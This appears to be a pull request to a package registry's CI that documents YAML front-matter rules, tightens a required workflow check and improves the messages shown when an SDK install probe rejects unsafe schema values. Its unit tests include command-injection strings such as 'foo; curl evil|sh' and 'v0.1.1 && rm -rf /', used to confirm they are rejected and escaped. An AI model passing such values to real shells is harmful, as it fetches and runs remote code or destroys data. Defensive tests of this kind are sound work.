### PR TITLE
Make the community contributor workflow smoother

### DIFF
--- a/.github/workflows/pull-request.yml
+++ b/.github/workflows/pull-request.yml
@@ -16,7 +16,7 @@ jobs:
     # The name of this action cannot be "Sentinel", since this job exists to create an
     # action result called "Sentinel".
     name: Sentinel Tower
-    if: github.event_name == 'repository_dispatch' || github.event.pull_request.head.repo.full_name == github.repository
+    if: github.event.pull_request.head.repo.full_name == github.repository
     permissions:
       statuses: write
     needs:
@@ -26,6 +26,7 @@ jobs:
     - lint-scripts
     - lint-dark-logos
     - test-provider-api-docs
+    - test-infra
     - preview
     - test-live-publish
     - check-publish

--- a/README.md
+++ b/README.md
@@ -17,8 +17,22 @@ We’re always eager to expand that index with new [Pulumi Packages](https://www
 To publish a community-maintained package on the Pulumi Registry as a community member:
 
 1. Ensure your provider repo has the following files:
-    * `docs/_index.md`, which should contain a summary of the provider's purpose (required) along with a code sample in each language (required). This file will render as the index page for your provider ([example](https://www.pulumi.com/registry/packages/aiven/)).
-    * `docs/installation-configuration.md`, which should contain links to published SDKs in (Go, Typescript, C#, Python; required) along with instructions for configuring the provider (e.g., required credentials and/or environment variables). This file will render as the Installation & Configuration page for your provider ([example](https://www.pulumi.com/registry/packages/aws/installation-configuration/)).
+    * `docs/_index.md`, which should contain a summary of the provider's purpose (required) along with a code sample in each language (required). This file will render as the index page for your provider ([rendered example](https://www.pulumi.com/registry/packages/aiven/), [its source](https://github.com/pulumi/pulumi-aiven/blob/master/docs/_index.md)).
+    * `docs/installation-configuration.md`, which should contain links to published SDKs in (Go, Typescript, C#, Python; required) along with instructions for configuring the provider (e.g., required credentials and/or environment variables). This file will render as the Installation & Configuration page for your provider ([rendered example](https://www.pulumi.com/registry/packages/aws/installation-configuration/), [its source](https://github.com/pulumi/pulumi-aws/blob/master/docs/installation-configuration.md)).
+
+    Both files must **begin** with YAML front matter, before any other text. Doc generation rejects a file that does not, and your package will not publish. Use exactly these three keys, and keep `layout: package`:
+
+    ```markdown
+    ---
+    title: Example Provider
+    meta_desc: Provides an overview of the Example provider for Pulumi.
+    layout: package
+    ---
+
+    ## Overview
+
+    What this provider manages, in a paragraph or two.
+    ```
 1. Create a release of your provider in GitHub with a "v" + [Semver 2.0](https://semver.org) compliant tag (`vX.Y.Z`).
 1. Open a pull request that adds one entry to [`community-packages/package-list.json`](https://github.com/pulumi/registry/blob/master/community-packages/package-list.json). That single entry is the whole registration: your docs and metadata are generated and published for you after merge, so do not commit generated files here. The one exception is a brand-new publisher, whose display name must be added to [`publisher-names.json`](https://github.com/pulumi/registry/blob/master/tools/resourcedocsgen/pkg/publishers/publisher-names.json) in the same PR, because publishing fails without it. Automated checks then post a fact-sheet on your PR; if anything is flagged, fix it in your provider repo and comment `/check` to re-run (the checks read your live upstream, so you do not push here to re-validate). A maintainer can comment `/preview` to build a live preview of your package's pages, then reviews the fact-sheet and approves. Nothing merges automatically.
 

--- a/scripts/ci/community-package/fact_sheet.py
+++ b/scripts/ci/community-package/fact_sheet.py
@@ -116,6 +116,9 @@ def render(manifest: Manifest) -> str:
                       "registry takes the version from the publish request, or stamp the real version at "
                       "release time."]
 
+    for result in [r for r in manifest.installMatrix if r.result == "rejected" and r.error]:
+        lines += ["", f"**{result.language}** 🚫 {result.error}"]
+
     findings = manifest.docLint
     lines.append("")
     if not manifest.indexPresent:

--- a/scripts/ci/community-package/sdk_install_probe.py
+++ b/scripts/ci/community-package/sdk_install_probe.py
@@ -62,9 +62,22 @@ def _echo_to_the_run_log(heading: str, body: str) -> None:
     print("::endgroup::", file=sys.stderr)
 
 
+def _rejected(language: str, kind: str, value: str, allowed: str,
+              blocking: bool = False) -> InstallResult:
+    shown = repr(value[:80]).replace("`", "'")
+    cell = shown.replace("|", r"\|")
+    return InstallResult(
+        language, f"(not run: {kind} is {cell})", "rejected", blocking=blocking,
+        error=f"The schema gives {kind} as `{shown}`. The check builds install commands from "
+              f"strings in your schema, so it accepts only {allowed}, and skips the probe instead "
+              f"of passing anything else to a shell. Fix the value in your schema, or say so on "
+              f"this PR if you believe it is correct.")
+
+
 def probe_installs(name: str, tag: str, schema: dict[str, Any]) -> list[InstallResult]:
     if not SAFE_VERSION.match(tag):
-        return [InstallResult("plugin", "(rejected: unsafe version)", "rejected", blocking=True)]
+        return [_rejected("plugin", "the release tag", tag,
+                          "letters, digits, and . _ + -", blocking=True)]
     version = tag[1:] if tag.startswith("v") else tag
     languages = schema.get("language", {})
     results: list[InstallResult] = []
@@ -83,30 +96,36 @@ def probe_installs(name: str, tag: str, schema: dict[str, Any]) -> list[InstallR
         ok, error = _run(command)
         record("plugin", f"pulumi plugin install resource {name} {tag}", ok, error, blocking=True)
     else:
-        results.append(InstallResult("plugin", "(rejected: unsafe identifier)", "rejected", blocking=True))
+        results.append(_rejected("plugin", "the provider name", name,
+                                 "letters, digits, and . _ @ / -", blocking=True))
 
-    def probe(language: str, package: str | None, runner: Callable[[], tuple[bool, str]], command: str) -> None:
+    def probe(language: str, kind: str, package: str | None,
+              runner: Callable[[], tuple[bool, str]], command: str) -> None:
         if not package:
             return
         if not SAFE_NAME.match(package):
-            results.append(InstallResult(language, "(rejected: unsafe name)", "rejected"))
+            results.append(_rejected(language, kind, package, "letters, digits, and . _ @ / -"))
             return
         ok, error = runner()
         record(language, command, ok, error)
 
     npm_package = languages.get("nodejs", {}).get("packageName")
-    probe("nodejs", npm_package,
+    probe("nodejs", "the nodejs packageName", npm_package,
           lambda: _run(["npm", "install", "--ignore-scripts", "--no-audit", "--no-fund",
                         "--prefix", "/tmp/nn", "--", f"{npm_package}@{version}"]),
           f"npm install {npm_package}@{version}")
 
     python = languages.get("python")
     pypi_package = (python.get("packageName") or f"pulumi_{schema.get('name', '')}") if python is not None else None
-    probe("python", pypi_package,
+    python_kind = ("the python packageName" if (python or {}).get("packageName")
+                   else "the python package name, taken from the schema name because python "
+                        "advertises no packageName")
+    probe("python", python_kind, pypi_package,
           lambda: _python_resolves(pypi_package or "", version),
           f"pip download {pypi_package}=={version}")
 
     go_import = languages.get("go", {}).get("importBasePath")
-    probe("go", go_import, lambda: _go_module_resolves(go_import, tag), f"go get {go_import}@{tag}")
+    probe("go", "the go importBasePath", go_import,
+          lambda: _go_module_resolves(go_import, tag), f"go get {go_import}@{tag}")
 
     return results

--- a/scripts/ci/community-package/test_community_package.py
+++ b/scripts/ci/community-package/test_community_package.py
@@ -37,6 +37,12 @@ SCHEMA: dict[str, Any] = {
 }
 
 
+def _rejected_probe(package_name: str) -> InstallResult:
+    schema = {**SCHEMA, "language": {"nodejs": {"packageName": package_name}}}
+    return next(r for r in sdk_install_probe.probe_installs("time", "v0.1.1", schema)
+                if r.language == "nodejs")
+
+
 class InstallProbeTests(unittest.TestCase):
     def setUp(self) -> None:
         self.calls: list[list[str]] = []
@@ -67,6 +73,47 @@ class InstallProbeTests(unittest.TestCase):
         self.assertEqual(results["plugin"], "rejected")
         self.assertEqual(results["nodejs"], "rejected")
         self.assertFalse(any(c and c[0] in ("npm", "pulumi") for c in self.calls))
+
+    def test_a_rejection_names_the_value_and_what_is_allowed(self) -> None:
+        node = _rejected_probe("foo; curl evil|sh")
+        self.assertIn("foo; curl evil", node.command)
+        self.assertIn("nodejs packageName", node.error)
+        self.assertIn("letters, digits", node.error)
+
+    def test_a_rejection_names_the_schema_key_it_read(self) -> None:
+        schema = {**SCHEMA, "language": {"go": {"importBasePath": "a b"},
+                                         "python": {"packageName": "a b"}}}
+        kinds = {r.language: r.error for r in sdk_install_probe.probe_installs("time", "v0.1.1", schema)}
+        self.assertIn("importBasePath", kinds["go"])
+        self.assertIn("packageName", kinds["python"])
+
+    def test_a_derived_python_name_says_where_it_came_from(self) -> None:
+        schema = {"name": "a b", "language": {"python": {}}}
+        python = next(r for r in sdk_install_probe.probe_installs("time", "v0.1.1", schema)
+                      if r.language == "python")
+        self.assertIn("taken from the schema name", python.error)
+
+    def test_a_pipe_in_the_value_cannot_break_the_table_row(self) -> None:
+        installs = [_rejected_probe("foo|sh")]
+        row = next(line for line in fact_sheet.render(_manifest(installs=installs)).splitlines()
+                   if "nodejs SDK" in line)
+        self.assertEqual(len(re.findall(r"(?<!\\)\|", row)), 4)
+        self.assertIn(r"\|", row)
+
+    def test_a_backtick_in_the_value_cannot_break_the_code_span(self) -> None:
+        rejected = _rejected_probe("foo`sh")
+        self.assertNotIn("`", rejected.command)
+        self.assertEqual(rejected.error.count("`"), 2)
+
+    def test_an_enormous_value_is_bounded(self) -> None:
+        rejected = _rejected_probe("!" * 5000)
+        self.assertLess(len(rejected.command), 200)
+        self.assertLess(len(rejected.error), 600)
+
+    def test_a_rejected_tag_says_it_is_the_tag(self) -> None:
+        rejected = sdk_install_probe.probe_installs("time", "v0.1.1 && rm -rf /", SCHEMA)
+        self.assertEqual([r.result for r in rejected], ["rejected"])
+        self.assertIn("release tag", rejected[0].error)
 
     def test_github_scheme_plugin_url_is_passed_as_server(self) -> None:
         schema = {**SCHEMA, "pluginDownloadURL": "github://api.github.com/o/r"}
@@ -267,6 +314,11 @@ class FactSheetTests(unittest.TestCase):
         out = fact_sheet.render(_manifest(schemaVersion="1.0.0"))
         self.assertIn("schema version", out)
         self.assertNotIn("declares version", out)
+
+    def test_a_rejection_reason_reaches_the_sheet(self) -> None:
+        out = fact_sheet.render(_manifest(installs=[_rejected_probe("a b")]))
+        self.assertIn("**nodejs** 🚫", out)
+        self.assertIn("The schema gives the nodejs packageName as `'a b'`", out)
 
     def test_red_render_with_install_failure(self) -> None:
         out = fact_sheet.render(_manifest(


### PR DESCRIPTION
Four independent, well-scoped changes.

**1. The README never documented the front-matter requirement.** `resourcedocsgen` rejects any `docs/_index.md` or `docs/installation-configuration.md` that does not begin with `---`, and this is exactly what has [#12177](https://github.com/pulumi/registry/pull/12177) stuck:

```
Error: expected file .../docs/_index.md to start with YAML front-matter ("---\n"),
found leading "index_md_content = \"\"\"---"
```

The [Adding a Package](https://github.com/pulumi/registry#adding-a-package) section linked two *rendered* example pages, where front matter is invisible. So the only way to learn the rule was to fail the check. This adds a copyable skeleton, states `layout: package`, and links the aiven and aws **source** files next to the rendered ones.

**2. `Sentinel Tower` did not wait on `test-infra`.** Its `needs` listed nine jobs; `Test Infrastructure Functions` was not one of them. Since `Sentinel` is the only required status check on `master`, a branch PR could go green with that job red. `make test-infra` passes on master today (36 tests, 67 ms), so gating on it is free.

This gap has never actually bitten, because `test-infra` covers exactly one file, `infrastructure/redirects.js`, which changed six times in the past year. The job runs on every PR; it just rarely has anything new to fail on.

**3. Dead condition on the same job.** The `if` read `github.event_name == 'repository_dispatch' || <fork guard>`, but this workflow only triggers on `pull_request`, so the first arm was always false and `false || B` is just `B`. It has never changed behavior, and this is tidying rather than a fix. The reason to remove it: if someone later adds a `repository_dispatch` trigger, Sentinel would start writing a success status on that event while skipping the fork guard entirely. Deleting the clause means that has to be a deliberate decision.

**4. `(rejected: unsafe name)` explained nothing.** It named neither the offending value nor the rule, and the fact-sheet rendered no detail for a rejected row. It now reads `(not run: the nodejs packageName is 'a b')` in the table, with the reason and the allowed character set below it. Same for a rejected release tag and provider name, and each message names the schema key the value came from: `importBasePath` for Go, not "the go package name".

Since the value is malformed or hostile by construction, it is bounded to 80 characters, its backticks are neutralized so it cannot escape the code span, and its pipes are escaped so it cannot break out of the table cell:

```
| nodejs SDK | 🚫 | `(not run: the nodejs packageName is 'foo\|sh; curl x'y')` |
```

100 unit tests pass, `mypy --strict` is clean, and `node --test infrastructure/redirects.test.js` passes.